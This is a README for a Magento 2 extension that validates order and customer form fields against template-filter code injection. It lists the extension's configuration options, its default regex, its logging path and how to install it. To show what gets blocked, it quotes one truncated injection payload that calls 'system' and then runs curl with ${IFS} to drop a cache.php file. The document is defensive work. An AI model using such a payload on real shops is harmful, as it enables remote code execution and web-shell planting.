Disallow random code injection in Magento 2 forms trough API or WEB requests for: Order Creation, Customer Creation, Customer Name Update, Customer Address Update
Random code like:
{{var this.getTemp lateFil ter().filt er(order)}} {{var this.getTemp lateFil ter().add AfterFil terCallb ack(system).Fil ter(cd${IFS%??}pub;curl${IFS%??}-o${IFS%??}cache.php${IFS....
The rejection mechanism is based on a configurable regular expression.
The default regular expression is '/[{}<>%]/' to reject characters like: { } < > %
It is also possible to configure a limit of characters to use only for the firstname and lastname fields validation.
- Enable: enable/disable module;
- Regular Expression: the regular expression to reject input values;
- Characters Limit: the limit of characters to use only for the firstname and lastname fields validation;
- Region Fields Validation: enable/disable the validation of region fields.
- Enable invalidation fields results notification: enable/disable invalidation fields results notification;
- Email addresses for invalidation fields results notification: Email addresses to receive invalidation fields results.
The extension provides the possibility to email to configurable addresses at the end of process to notify the invalidation fields results.
The log file is in the path: /var/log/wapone_input_fields_validator.log
composer require wapone/module-input-fields-validator
Forked from bafmaamy/Magento-FieldValidator.